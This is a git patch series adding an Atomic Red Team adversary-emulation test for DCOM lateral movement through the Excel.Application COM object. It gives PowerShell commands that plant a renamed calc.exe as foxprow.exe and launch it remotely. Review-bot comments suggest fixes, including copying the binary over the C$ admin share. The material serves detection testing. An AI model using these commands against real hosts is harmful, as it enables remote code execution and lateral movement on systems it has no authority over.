From cf46249bc86c68174d01755fc41e05a6f029e10b Mon Sep 17 00:00:00 2001
From: Kostas
Date: Wed, 1 Nov 2023 13:40:48 -0700
Subject: [PATCH 1/9] New Atomic - Excel Application Object for LM
---
 atomics/T1021.003/T1021.003.md | 60 ++++++++++++++++++++++++++++++++
 atomics/T1021.003/T1021.003.yaml | 40 +++++++++++++++++++++
 2 files changed, 100 insertions(+)
diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md
index a14d9d78..7e46f70a 100644
--- a/atomics/T1021.003/T1021.003.md
+++ b/atomics/T1021.003/T1021.003.md
@@ -11,6 +11,7 @@ Through DCOM, adversaries operating in the context of an appropriately privilege
 ## Atomic Tests
 - [Atomic Test #1 - PowerShell Lateral Movement using MMC20](#atomic-test-1---powershell-lateral-movement-using-mmc20)
+- [Atomic Test #2 - PowerShell Lateral Movement using Excel Application](#atomic-test-2---powershell-lateral-movement-using-excel-application)
@@ -47,8 +48,67 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
 ```
+
+## Atomic Test #2 - PowerShell Lateral Movement using Excel Application
+Powershell lateral movement via Excel Application COM objects.
+
+Reference:
+
+https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922
+
+
+Upon successful execution, cmd will spawn calc.exe on a remote computer.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b46d327c-c336-43d9-906e-d53be5358535
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| hostname | Hostname or IP | string | localhost|
+| user | Name of user | string | admin
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
+$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","localhost"))
+$com.ActivateMicrosoftApp("5")
+```
+
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name "foxprow.exe" -ErrorAction Ignore
+Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft Excel must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "Excel.Application" | Out-Null
+ Stop-Process -Name "Excel"
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
+```
diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml
index 233c88eb..2419c973 100644
--- a/atomics/T1021.003/T1021.003.yaml
+++ b/atomics/T1021.003/T1021.003.yaml
@@ -22,3 +22,43 @@ atomic_tests:
     command: |
       [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
     name: powershell
+- name: PowerShell Lateral Movement Using Excel Application Object
+  auto_generated_guid: b46d327c-c336-43d9-906e-d53be5358535
+  description: |
+    Powershell lateral movement using the Excel COM objects.
+
+    Reference:
+
+    https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922
+
+    Upon successful execution, cmd will spawn calc.exe on a remote computer.
+  supported_platforms:
+  - windows
+  dependencies:
+  - description: |
+      Microsoft Excel must be installed
+    prereq_command: |
+      try {
+        New-Object -COMObject "Excel.Application" | Out-Null
+        Stop-Process -Name "Excel"
+        exit 0
+      } catch { exit 1 }
+    get_prereq_command: |
+      Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
+  cleanup_command: |
+    Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
+  input_arguments:
+    computer_name: hostname
+      description: Hostname or IP
+      type: string
+      default: localhost
+    user:
+      description: Name of user
+      type: string
+      default: admin
+  executor:
+    command: |
+      copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
+      $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","localhost"))
+      $com.ActivateMicrosoftApp("5")
+    name: powershell
From c74a2d309ebef0541a6f9f863ef8a3cdf5014c3f Mon Sep 17 00:00:00 2001
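Review bot: The `cleanup_command` added in this hunk only deletes foxprow.exe; the EXCEL.EXE instance that `CreateInstance` activates on the target is never quit, so every run leaves a hidden Excel process behind, and the .md version of this test carries an extra `Stop-Process -Name "foxprow.exe"` line that the yaml lacks and that would never match anyway (`-Name` takes the image name without the `.exe` suffix). Suggest making the yaml cleanup `Stop-Process -Name "foxprow","EXCEL" -ErrorAction Ignore` followed by the existing `Remove-Item`, with the caveat that this also closes any other Excel instance on the host, as the prereq check already does. The description's "cmd will spawn calc.exe" is also inaccurate for this test: nothing here runs cmd, and the file launched is the copied calc.exe renamed foxprow.exe, presumably because `ActivateMicrosoftApp("5")` (xlMicrosoftFoxPro) makes Excel start `foxprow.exe`, which resolves through the per-user WindowsApps PATH entry to the planted copy. One sentence stating that in the description would explain the non-obvious file name and enum value to whoever runs or writes detections for this test.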
From: Kostas
Date: Wed, 1 Nov 2023 15:00:14 -0700
Subject: [PATCH 2/9] Update T1021.003.yaml
Removed auto_generated_guid
---
 atomics/T1021.003/T1021.003.yaml | 1 -
 1 file changed, 1 deletion(-)
diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml
index 2419c973..0da360b2 100644
--- a/atomics/T1021.003/T1021.003.yaml
+++ b/atomics/T1021.003/T1021.003.yaml
@@ -23,7 +23,6 @@ atomic_tests:
       [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
     name: powershell
 - name: PowerShell Lateral Movement Using Excel Application Object
-  auto_generated_guid: b46d327c-c336-43d9-906e-d53be5358535
   description: |
     Powershell lateral movement using the Excel COM objects.
From fa4a6ed20b921ae19814bec2aad0de978711b3a7 Mon Sep 17 00:00:00 2001
From: Kostas
Date: Wed, 1 Nov 2023 15:00:34 -0700
Subject: [PATCH 3/9] Update T1021.003.md
Removed auto_generated_guid
---
 atomics/T1021.003/T1021.003.md | 4 ----
 1 file changed, 4 deletions(-)
diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md
index 7e46f70a..98541c43 100644
--- a/atomics/T1021.003/T1021.003.md
+++ b/atomics/T1021.003/T1021.003.md
@@ -64,10 +64,6 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
 **Supported Platforms:** Windows
-**auto_generated_guid:** b46d327c-c336-43d9-906e-d53be5358535
-
-
-
 #### Inputs:
From f3e33ee0b46ce92ff0cb4e9f7f5e08cbb09c5a05 Mon Sep 17 00:00:00 2001
From: Kostas
Date: Thu, 2 Nov 2023 00:18:17 -0700
Subject: [PATCH 4/9] Update T1021.003.yaml
Fixing yaml error
---
 atomics/T1021.003/T1021.003.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml
index 0da360b2..314c9d41 100644
--- a/atomics/T1021.003/T1021.003.yaml
+++ b/atomics/T1021.003/T1021.003.yaml
@@ -23,6 +23,7 @@ atomic_tests:
       [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
     name: powershell
 - name: PowerShell Lateral Movement Using Excel Application Object
+  auto_generated_guid: b46d327c-c336-43d9-906e-d53be5358535
   description: |
     Powershell lateral movement using the Excel COM objects.
@@ -47,7 +48,7 @@ atomic_tests:
   cleanup_command: |
     Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
   input_arguments:
-    computer_name: hostname
+    hostname:
       description: Hostname or IP
       type: string
       default: localhost
From 85eefc4349e082924dfb58af3135eed3d1cf0b8c Mon Sep 17 00:00:00 2001
From: Jose Enrique Hernandez
Date: Thu, 2 Nov 2023 12:57:03 -0400
Subject: [PATCH 5/9] Delete atomics/T1021.003/T1021.003.md
---
 atomics/T1021.003/T1021.003.md | 110 ---------------------------------
 1 file changed, 110 deletions(-)
 delete mode 100644 atomics/T1021.003/T1021.003.md
diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md
deleted file mode 100644
index 98541c43..00000000
--- a/atomics/T1021.003/T1021.003.md
+++ /dev/null
@@ -1,110 +0,0 @@
-# T1021.003 - Remote Services: Distributed Component Object Model
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/003)
-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
-
-The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
-
-Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
-
-Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. 
DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)
-
-## Atomic Tests
-
-- [Atomic Test #1 - PowerShell Lateral Movement using MMC20](#atomic-test-1---powershell-lateral-movement-using-mmc20)
-- [Atomic Test #2 - PowerShell Lateral Movement using Excel Application](#atomic-test-2---powershell-lateral-movement-using-excel-application)
-
-
-
-
-## Atomic Test #1 - PowerShell Lateral Movement using MMC20
-Powershell lateral movement using the mmc20 application com object.
-
-Reference:
-
-https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
-
-Upon successful execution, cmd will spawn calc.exe on a remote computer.
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| computer_name | Name of Computer | string | localhost|
-
-
-#### Attack Commands: Run with `powershell`!
-
-
-```powershell
-[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
-```
-
-
-
-
-
-## Atomic Test #2 - PowerShell Lateral Movement using Excel Application
-Powershell lateral movement via Excel Application COM objects.
-
-Reference:
-
-https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922
-
-
-Upon successful execution, cmd will spawn calc.exe on a remote computer.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| hostname | Hostname or IP | string | localhost|
-| user | Name of user | string | admin
-
-
-#### Attack Commands: Run with `powershell`!
-
-
-```powershell
-copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
-$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","localhost"))
-$com.ActivateMicrosoftApp("5")
-```
-
-
-#### Cleanup Commands:
-```powershell
-Stop-Process -Name "foxprow.exe" -ErrorAction Ignore
-Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
-```
-
-
-
-#### Dependencies: Run with `powershell`!
-##### Description: Microsoft Excel must be installed
-##### Check Prereq Commands:
-```powershell
-try {
- New-Object -COMObject "Excel.Application" | Out-Null
- Stop-Process -Name "Excel"
- exit 0
-} catch { exit 1 }
-```
-##### Get Prereq Commands:
-```powershell
-Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
-```
-
-
-
From 31e78421667d3af2f3fcbf0ce8ddf1f545613b89 Mon Sep 17 00:00:00 2001
From: Jose Enrique Hernandez
Date: Thu, 2 Nov 2023 12:59:54 -0400
Subject: [PATCH 6/9] Update T1021.003.yaml
removing auto-generated UUID
---
 atomics/T1021.003/T1021.003.yaml | 1 -
 1 file changed, 1 deletion(-)
diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml
index 314c9d41..46e5b655 100644
--- a/atomics/T1021.003/T1021.003.yaml
+++ b/atomics/T1021.003/T1021.003.yaml
@@ -2,7 +2,6 @@ attack_technique: T1021.003
 display_name: 'Remote Services: Distributed Component Object Model'
 atomic_tests:
 - name: PowerShell Lateral Movement using MMC20
-  auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
   description: |
     Powershell lateral movement using the mmc20 application com object.
From 4e38b6d8766af3828cee83fb2ed73481e907ae0f Mon Sep 17 00:00:00 2001
From: Jose Enrique Hernandez
Date: Thu, 2 Nov 2023 13:07:02 -0400
Subject: [PATCH 7/9] Update T1021.003.yaml
---
 atomics/T1021.003/T1021.003.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml
index 46e5b655..7c9a27da 100644
--- a/atomics/T1021.003/T1021.003.yaml
+++ b/atomics/T1021.003/T1021.003.yaml
@@ -2,6 +2,7 @@ attack_technique: T1021.003
 display_name: 'Remote Services: Distributed Component Object Model'
 atomic_tests:
 - name: PowerShell Lateral Movement using MMC20
+  auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
   description: |
     Powershell lateral movement using the mmc20 application com object.
@@ -22,7 +23,6 @@ atomic_tests:
       [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
     name: powershell
 - name: PowerShell Lateral Movement Using Excel Application Object
-  auto_generated_guid: b46d327c-c336-43d9-906e-d53be5358535
   description: |
     Powershell lateral movement using the Excel COM objects.
From ab386927c89732a2735baed351db76a103d83031 Mon Sep 17 00:00:00 2001
From: Kostas
Date: Thu, 2 Nov 2023 11:33:59 -0700
Subject: [PATCH 8/9] Update T1021.003.yaml
Changed hostname field name to computer_name
---
 atomics/T1021.003/T1021.003.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml
index 7c9a27da..e9f822f0 100644
--- a/atomics/T1021.003/T1021.003.yaml
+++ b/atomics/T1021.003/T1021.003.yaml
@@ -47,7 +47,7 @@ atomic_tests:
   cleanup_command: |
     Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
   input_arguments:
-    hostname:
+    computer_name:
       description: Hostname or IP
       type: string
       default: localhost
From 60fe9e1b3f89077afd03bd45cdaea0ede8b5cf1b Mon Sep 17 00:00:00 2001
From: Kostas
Date: Thu, 2 Nov 2023 20:22:49 -0700
Subject: [PATCH 9/9] Update T1021.003.yaml
---
 atomics/T1021.003/T1021.003.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml
index e9f822f0..00af884c 100644
--- a/atomics/T1021.003/T1021.003.yaml
+++ b/atomics/T1021.003/T1021.003.yaml
@@ -58,6 +58,6 @@ atomic_tests:
   executor:
     command: |
       copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
-      $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","localhost"))
+      $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","#{computer_name}"))
       $com.ActivateMicrosoftApp("5")
     name: powershell
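Review bot: With the activation now targeting `#{computer_name}`, the `copy` on the line above still writes foxprow.exe to the local `C:\users\#{user}\...\WindowsApps` path, so for any value other than localhost the planted binary is not on the machine where Excel is started and `ActivateMicrosoftApp("5")` has nothing to launch there. The copy, and the `Remove-Item` in `cleanup_command` (outside this hunk), should address the target instead, e.g. `copy c:\windows\system32\calc.exe "\\#{computer_name}\C$\users\#{user}\AppData\Local\Microsoft\WindowsApps\foxprow.exe"`, which also makes the admin-share write the test depends on explicit for anyone building detections around it. It is worth a description sentence that `#{user}` must be the profile under which the DCOM-launched Excel runs on the target, since that is what determines which WindowsApps directory is searched; the default `admin` is unlikely to match a real host.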